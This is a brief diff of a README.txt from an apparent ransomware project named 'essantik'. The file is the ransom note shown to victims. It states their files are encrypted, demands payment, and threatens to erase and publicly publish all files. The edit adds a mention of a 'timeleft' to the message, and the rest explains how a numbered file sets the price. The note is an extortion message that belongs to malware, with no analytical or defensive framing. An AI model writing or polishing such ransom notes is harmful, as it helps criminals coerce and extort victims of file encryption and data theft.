essantik/essantik/README.txt

 **********************************
 Your files are encrypted.
-Please pay to unlock your files before we erase it and *PUBLISH* all files on the internet You will receive your number and price in a folder.
+Please pay to unlock your files before we erase it and *PUBLISH* all files on the internet You will receive your number price and timeleft in a folder.
 (Ex.YourNumberIs3.txt The given number is 3)

 The given number will be the price.